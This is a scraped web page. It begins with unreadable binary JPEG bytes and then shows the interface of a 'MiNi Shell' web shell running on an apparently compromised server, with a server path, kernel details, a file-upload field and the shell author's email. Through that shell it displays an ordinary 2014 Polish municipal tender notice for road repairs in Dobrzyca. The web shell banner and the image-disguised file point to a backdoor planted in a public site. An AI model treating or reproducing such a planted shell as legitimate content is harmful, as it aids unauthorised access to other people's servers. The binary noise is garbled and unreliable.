JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140417/133198-N-2014.html

<p class="kh_header"><b>Dobrzyca: PRZEBUDOWA  I  REMONTY  DRÓG  GMINNYCH:  LUTYNIA - RUDA, TRZEBIN - SAPIEŻYN, GALEW, POLSKIE OLĘDRY - SAPIEŻYN,  TRZEBIN - GALEW, UL. JESIONOWA W DOBRZYCY</b><br>
<b>Numer ogłoszenia: 133198 - 2014; data zamieszczenia: 17.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobrzyca , Rynek 14, 63-330 Dobrzyca, woj. wielkopolskie, tel. 062 7413013, faks 062 7413013.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dobrzyca.bazagmin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA  I  REMONTY  DRÓG  GMINNYCH:  LUTYNIA - RUDA, TRZEBIN - SAPIEŻYN, GALEW, POLSKIE OLĘDRY - SAPIEŻYN,  TRZEBIN - GALEW, UL. JESIONOWA W DOBRZYCY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  PRZEBUDOWA  I  REMONTY  DRÓG  GMINNYCH:  LUTYNIA - RUDA, TRZEBIN - SAPIEŻYN, GALEW, POLSKIE OLĘDRY - SAPIEŻYN,  TRZEBIN - GALEW, UL. JESIONOWA W DOBRZYCY

Zakres przedmiotu zamówienia obejmuje następujące zadania:
1.	PRZEBUDOWA  DROGI  GMINNEJ  TRZEBIN - GALEW  na  odcinku  265,5mb 
       Zakres inwestycji  obejmuje m.in. :
   - opracowanie projektu organizacji ruchu oraz zabezpieczenia robót na czas ich prowadzenia wraz z wykonaniem oznakowania, ewentualnych objazdów
   - opracowanie geodezyjnej dokumentacji powykonawczej 
- roboty przygotowawcze
- wykonanie podbudowy  z kruszywa  łamanego
- wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowo-żwirowych
- wykonanie zjazdów i przepustów
- odmulenie cieków
- oznakowanie pionowe

2.	PRZEBUDOWA  DROGI  GMINNEJ  POLSKIE OLĘDRY - SAPIEŻYN na  odcinku  200mb
       Zakres inwestycji obejmuje m.in.:
       - opracowanie projektu organizacji ruchu oraz zabezpieczenia robót na czas ich prowadzenia wraz z   wykonaniem oznakowania, ewentualnych objazdów
  - opracowanie geodezyjnej dokumentacji powykonawczej 
        - roboty przygotowawcze
        - roboty ziemne
        - wykonanie podbudowy 
        - wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowo-żwirowych
 - zabezpieczenie przewodów sieci teletechnicznej

3.	PRZEBUDOWA  DROGI  GMINNEJ  Nr 628533P w GALEWIE  na  odcinku  360mb
       Zakres inwestycji obejmuje m.in.:
       - opracowanie projektu organizacji ruchu oraz zabezpieczenia robót na czas ich prowadzenia wraz z   wykonaniem oznakowania, ewentualnych objazdów
       - opracowanie geodezyjnej dokumentacji powykonawczej 
       - roboty przygotowawcze
       - oczyszczenie mechaniczne nawierzchni ulepszonej z bitumu
       - skropienie nawierzchni asfaltem
       - wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowo-żwirowych
      - utwardzenie poboczy kruszywem
      - odmulenie cieków

4.	PRZEBUDOWA  DROGI  GMINNEJ  TRZEBIN - SAPIEŻYN  na  odcinku 180mb
       Zakres inwestycji obejmuje m.in.:
       - opracowanie projektu organizacji ruchu oraz zabezpieczenia robót na czas ich prowadzenia wraz z   wykonaniem oznakowania, ewentualnych objazdów
       - opracowanie geodezyjnej dokumentacji powykonawczej 
       - roboty przygotowawcze
       - skropienie nawierzchni asfaltem
       - wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowo-żwirowych
      - utwardzenie poboczy kruszywem

5.	PRZEBUDOWA  DROGI  GMINNEJ  LUTYNIA - RUDA  na  odcinku 150,50m
       Zakres inwestycji obejmuje m.in.:
       - opracowanie projektu organizacji ruchu oraz zabezpieczenia robót na czas ich prowadzenia wraz z wykonaniem oznakowania, ewentualnych objazdów
       - opracowanie geodezyjnej dokumentacji powykonawczej 
       - roboty przygotowawcze
       - korytowanie i wykonanie podbudowy  na odcinku  dł. 46m, 
       - oczyszczenie mechaniczne nawierzchni ulepszonej z bitumu
       - skropienie nawierzchni asfaltem
       - wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowo-żwirowych
      - utwardzenie poboczy kruszywem
     Z uwagi na zły stan techniczny drogi, na odcinku km 0+371 do km 0+417m przewidziano korytowanie oraz wykonanie podbudowy (zakres robót nie ujęty w opisie technicznym projektu ale  uwzględniony w kosztorysie ofertowym).  

6.	REMONT  DROGI  GMINNEJ - UL. JESIONOWEJ W DOBRZYCY  na  odcinku 188m
        Zakres inwestycji obejmuje m.in.:
       - opracowanie projektu organizacji ruchu oraz zabezpieczenia robót na czas ich prowadzenia wraz z   wykonaniem oznakowania, ewentualnych objazdów
       - opracowanie geodezyjnej dokumentacji powykonawczej 
       - roboty przygotowawcze
       - frezowanie nawierzchni
       - oczyszczenie mechaniczne nawierzchni ulepszonej z bitumu
      - skropienie asfaltem
      - wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowo-żwirowych
      - naprawy  poboczy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.31.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości : 
5.000,00zł 
(słownie: pięć tysięcy zł) 
Termin wniesienia wadium upływa dnia 06.05.2014 r.  o godz. 9.00. 

1) Formy i miejsce wniesienia wadium.

Wadium może być wnoszone:
-	w pieniądzu - przelewem na rachunek bankowy Zamawiającego:
       BS Dobrzyca 10  8409  0001  2001  0000  0101  0001
-	poręczeniach  bankowych,
-	gwarancjach  bankowych,
-	gwarancjach  ubezpieczeniowych,
-	poręczeniach  udzielanych  przez  podmioty,  o  których  mowa  w   art. 6b ust.5 pkt  2  ustawy  z  dnia 
9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju  Przedsiębiorczości  (Dz.U. z 2007 r. Nr 42, poz. 275, z 2008r.  Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620) złożonych w kasie Zamawiającego.
  Zamawiający dokona zwrotu wadium w kasie Zamawiającego lub przekaże dyspozycję do banku zgodnie  
  z warunkami określonymi w art. 46 ustawy Prawo zamówień publicznych.

UWAGA:
Wniesienie wadium w pieniądzu za pomocą przelewu bankowego, Zamawiający będzie uważał za skuteczne tylko wówczas, gdy kwota wadium znajdzie się na koncie  Zamawiającego przed upływem terminu składania ofert.
Wadium  musi  być zabezpieczone na okres 30 dni, licząc od daty składania ofert - termin związania z ofertą. Oferta zabezpieczona na okres krótszy niż wymagany - zostanie odrzucona.
Wykonawca, który nie zabezpieczy oferty ww. formą wadium, zostanie przez Zamawiającego wykluczony z ubiegania się o udzielenie zamówienia publicznego.

2) Zwrot wadium

1) Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem, że Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
2) Wykonawcy którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
3) Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
4) Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt 4.1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
5) Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.

3) Zatrzymanie wadium 

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, 
o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych - wzór stanowiący załącznik nr 4 do Specyfikacji Istotnych Warunków Zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli wykaże się wykonaniem w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, trzech robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia.
Za robotę budowlaną odpowiadającą przedmiotowi zamówienia Zamawiający uzna robotę budowlaną polegającą na przebudowie/budowie drogi - wykonaniu nawierzchni  bitumicznej na  odcinku min. 150m (każda)
Powyższe Wykonawca musi wykazać w formie załączonego do oferty wykazu wykonanych robót z załączeniem dokumentów, że roboty zostały wykonane należycie - wzór stanowiący załącznik nr 7 do Specyfikacji Istotnych Warunków Zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych - wzór stanowiący załącznik nr 4 do Specyfikacji Istotnych Warunków Zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga aby Wykonawca do spełnienia tego warunku dysponował kadrą inżynieryjno-techniczną z uprawnieniami budowlanymi  do kierowania robotami branży budowlanej w specjalności drogowej bez ograniczeń (określone przepisami ustawy z dnia 7 lipca 1994 roku Prawo budowlane /Dz. U. z 2006r., Nr 156, poz. 1118 z późn. zm./ lub odpowiadające im ważne uprawnienia budowlane w zakresie w/w specjalności, które zostały wydane na podstawie wcześniej  obowiązujących przepisów), osobami  legitymującymi się doświadczeniem i kwalifikacjami odpowiednimi do stanowisk, jakie zostaną im powierzone (zał. nr 8 do SIWZ), 
Należy złożyć oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień wg wzoru do SIWZ - Zał. Nr 9.
Zamawiający wymaga w dniu podpisania umowy z Wykonawcą dostarczenie dokumentów potwierdzających uprawnienia zawodowe branży budowlanej w specjalności drogowej bez ograniczeń (określone przepisami ustawy z dnia 7 lipca 1994 roku Prawo budowlane /Dz. U. z 2006r., Nr 156, poz. 1118 z późn. zm./ lub odpowiadające im ważne uprawnienia budowlane w zakresie w/w specjalności, które zostały wydane na podstawie wcześniej  obowiązujących przepisów),  oraz aktualne zaświadczenie potwierdzające jego członkostwo do właściwej terenowo izbie samorządu zawodowego - kserokopie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych - wzór stanowiący załącznik nr 4 do Specyfikacji Istotnych Warunków Zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) dowód  wniesienia  wadium
2) wykaz dokumentów złożonych w ofercie wg wzoru  (zał. nr 1do SIWZ),
3) formularz  ofertowy  -  wg  wzoru   (zał. nr 2 do SIWZ) wraz z kosztorysami ofertowymi
4) zaparafowany   projekty  umowy - wg  wzoru  (zał. nr 5 do SIWZ)
5) wykaz części zamówienia, które Wykonawca powierzy podwykonawcom  (zał. nr 10 do SIWZ).
6) Zobowiązania podmiotów trzecich - jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia, żąda określenia w pisemnym zobowiązaniu podmiotu trzeciego lub innym dokumencie: 
- zakresu dostępnych Wykonawcy zasobów innego podmiotu,
- sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia,
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia
7) Pełnomocnictwo - w przypadku, gdy Wykonawcę reprezentuje pełnomocnik - do oferty musi być załączone pełnomocnictwo określające zakres upoważnienia i podpisane przez osoby reprezentujące osobę prawną lub fizyczną; pełnomocnictwo musi być dołączone do oferty w formie oryginału albo kopii poświadczonej przez notariusza za zgodność z oryginałem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany i uzupełnienia treści umowy winny zostać dokonane wyłącznie w formie aneksu podpisanego przez obie strony,  pod rygorem nieważności.
2.	Każdorazowo wprowadzenie zmian winno być potwierdzone w formie pisemnej protokołami konieczności zatwierdzonymi przez Zamawiającego.
3.	Warunkiem wprowadzania zmian jest zgoda obu stron umowy. Zmiana umowy musi być zawarta w formie pisemnej.
4.	Zamawiający dopuszcza możliwość wprowadzenia zmian w umowie, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek z następujących sytuacji:
a)	udzielenie w trakcie realizacji umowy zamówień dodatkowych, związanych z realizacją zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji,
b)	udzielenie w trakcie realizacji umowy robót zamiennych objętych kosztorysem ofertowym,
c)	zmiany terminu wykonania umowy polegającej na skróceniu jego okresu, pod warunkiem zabezpieczenia środków finansowych w budżecie Zamawiającego,
d)	konieczności wprowadzenia zmian wynikających z przekształcenia stron umowy bądź zmiany osób uprawnionych do występowania w imieniu stron,
e)	konieczności wprowadzenia zmian w związku ze zmianą osób odpowiedzialnych za przebieg procesu budowlanego np. kierownika budowy, inspektora nadzoru itp.
f)	w sytuacji wyrażenia przez Zamawiającego zgody na wykonanie części robót przez podwykonawców po wyrażeniu woli w ofercie przez Wykonawcę na część wykonania robót przez podwykonawców,
g)	w sytuacji wystąpienia siły wyższej w szczególności:
-	wystąpienia niekorzystnych warunków atmosferycznych, powodujących konieczność zmiany terminu realizacji zadania,
-	wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
h)	w przypadku konieczności wykonania dodatkowych badań i ekspertyz, niezbędnych do wykonania przedmiotu zamówienia,
i)	w przypadku urzędowej zmian stawki podatku od towarów i usług (VAT).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dobrzyca.bazagmin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Gminy Dobrzyca, ul. Rynek 14, 63-330 Dobrzyca, pok. nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2014 godzina 09:00, miejsce: Urząd Miejski Gminy Dobrzyca, ul. Rynek 14, 63-330 Dobrzyca, pok. nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie  1 i 2 są współfinansowane  ze  środków budżetu Województwa  Wielkopolskiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com